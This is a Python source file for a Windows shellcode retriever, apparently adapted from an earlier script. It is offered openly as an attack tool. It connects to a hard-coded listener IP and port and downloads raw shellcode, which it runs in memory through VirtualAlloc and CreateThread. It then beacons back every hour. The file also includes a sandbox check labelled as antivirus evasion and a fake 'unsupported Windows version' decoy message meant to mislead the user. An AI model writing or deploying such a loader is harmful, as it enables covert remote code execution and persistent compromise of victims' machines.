retriever.py

1. #!/usr/bin/env python
2. #
3. # Windows Shellcode Retriever
4. # By: HR
5. #
6. # It's just a slightly modified version of Joshua Pitts' Shellcode Retriever Script...
7. # Use Shellcode Sender on the other end to serve up your payloads for execution
8. #
9.  
10. import ctypes, os, signal, socket, sys, time
11.  
12. TARGET='192.168.1.4' # Shellcode Sender Listener IP
13. PORT=31337           # Shellcode Sender Listener Port
14. BEACON=True          # Repeat Shellcode Retrival
15. BEACON_DELAY=3600    # 1 hour delay between retrieval attempts
16.  
17.  
18. def system_info():
19.   """
20.     Check System Info and Returns Info in Dictionary Array
21.       {
22.         'Available Physical Memory': '644 MB',
23.         'Product ID': '00426-OEM-8992662-00006',
24.         'OS Name': 'Microsoft Windows 7 Ultimate',
25.         'BIOS Version': 'Phoenix Technologies LTD 6.00, 7/2/2012',
26.         'System Model': 'VMware Virtual Platform',
27.         'System type': 'X86-based PC',
28.         'Total Physical Memory': '1,023 MB',
29.         'Logon Server': '\\\\WIN-6CQ3JVLCHM4',
30.         'Domain': 'WORKGROUP',
31.         'Windows Directory': 'C:\\Windows',
32.         'OS Version': '6.1.7601 Service Pack 1 Build 7601',
33.         'System Manufacturer': 'VMware, Inc.',
34.         'Host Name': 'WIN-6CQ3JVLCHM4'
35.       }
36.  
37.     Example:
38.        >>> info = SysInfo()
39.        >>> info['OS Version']
40.        '6.1.7601 Service Pack 1 Build 7601'
41.  
42.     Borrowed from our sacred stackoverflow:
43.        http://stackoverflow.com/questions/467602/how-can-i-read-system-information-in-python-on-windows
44.  """
45.   values  = {}
46.   cache   = os.popen2("SYSTEMINFO")
47.   source  = cache[1].read()
48.   sysOpts = ["Host Name", "OS Name", "OS Version", "Product ID", "System Manufacturer", "System Model", "System type", "BIOS Version", "Domain", "Windows Directory", "Total Physical Memory", "Available Physical Memory", "Logon Server"]
49.   for opt in sysOpts:
50.     values[opt] = [item.strip() for item in re.findall("%s:\w*(.*?)\n" % (opt), source, re.IGNORECASE)][0]
51.   return values
52.  
53.  
54. def decoy_message():
55.   """ Decoy Message to Present to User on Epic Failure """
56.   info = system_info()
57.   print "\n[x] Unsupported Windows Version!"
58.   print "   [*] Platform: %s" % sys.platform
59.   print "   [x] Build Version: %s" % info['OS Version']
60.   print "\n[*] Keep Checking Developer Site for updates...\n\n"
61.   sys.exit(0)
62.  
63.  
64. def sandbox_check():
65.   """
66.     Quick sandbox check for additional av evasion.
67.     And a message to throw the user off.
68.  """
69.   ##################################################################################
70.   # Add some mathematical stuff or some time consuming activities for added delays #
71.   ##################################################################################
72.   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
73.   sandbox = True
74.   try:
75.     s.connect(('127.0.0.1', 445))
76.     s.close()
77.     sandbox = False
78.   except:
79.     pass
80.   if sandbox == True:
81.     try:
82.       s.connect(('127.0.0.1', 135))
83.       s.close()
84.     except:
85.       # Mission Abort!
86.       decoy_message()
87.  
88.  
89. def run_shellcode(shellcode):
90.   """
91.     ctypes VritualAlloc, MoveMem, and CreateThread
92.     From http://www.debasish.in/2012_04_01_archive.html
93.  """
94.   # Get pointer to our allocated memory space
95.   pointer = ctypes.windll.kernel32.VirtualAlloc(
96.     ctypes.c_int(0),
97.     ctypes.c_int(len(shellcode)),
98.     ctypes.c_int(0x3000),
99.     ctypes.c_int(0x40)
100.   )
101.  
102.   # Move Shellcode into memory
103.   buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
104.   ctypes.windll.kernel32.RtlMoveMemory(
105.     ctypes.c_int(pointer),
106.     buf,
107.     ctypes.c_int(len(shellcode))
108.   )
109.  
110.   # Create new thread and run our shellcode in it
111.   thread_handle = ctypes.windll.kernel32.CreateThread(
112.     ctypes.c_int(0),
113.     ctypes.c_int(0),
114.     ctypes.c_int(pointer),
115.     ctypes.c_int(0),
116.     ctypes.c_int(0),
117.     ctypes.pointer(ctypes.c_int(0))
118.   )
119.  
120.   # Wait for our thread to finish or timeout
121.   ctypes.windll.kernel32.WaitForSingleObject(
122.     ctypes.c_int(thread_handle),
123.     ctypes.c_int(-1)
124.   )
125.   return
126.  
127.  
128.  
129. def fetch_shellcode(target, port):
130.   """
131.     Raw TCP Socket Request to Target:Port to grab our remote shellcode
132.     The received Shellcode is then passed off to be run
133.  """
134.   # Open TCP Socket Connection to target:port
135.   print '[*] Downloading Shellcode...'
136.   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
137.   s.connect((target,port))
138.  
139.   # Receive shellcode
140.   data = s.recv(1024)
141.   shellcode = data
142.   while data != '':
143.     data = s.recv(1024)
144.     if data == '':
145.       break
146.     else:
147.       shellcode += data
148.  
149.   # Convert to Bytearray for usability sake
150.   shellcode = bytearray(shellcode)
151.  
152.   # Pass to be run in memory...
153.   print '[*] Executing Shellcode in Memory....'
154.   run_shellcode(shellcode)
155.  
156.  
157.  
158. def main():
159.   # Does making connetions raise alerts?
160.   sandbox_check()
161.    
162.   if TARGET == '':
163.     decoy_message() # If you cant read and edit source, you fail
164. #    TARGET = raw_input("Enter Shellcode Listner IP: ")
165. #    PORT = raw_input("Enter Shellcode Listner Port: ")
166.   try:
167.     fetch_shellcode(TARGET, int(PORT))
168.     while BEACON is True:
169. #      print '[*] Sleeping for %d seconds....' % BEACON_DELAY
170.       time.sleep(BEACON_DELAY)
171.       fetch_shellcode(TARGET, int(PORT))
172.            
173.   except Exception, e:
174. #    print str(e)
175.     pass
176.    
177. if __name__ == "__main__":
178.   main()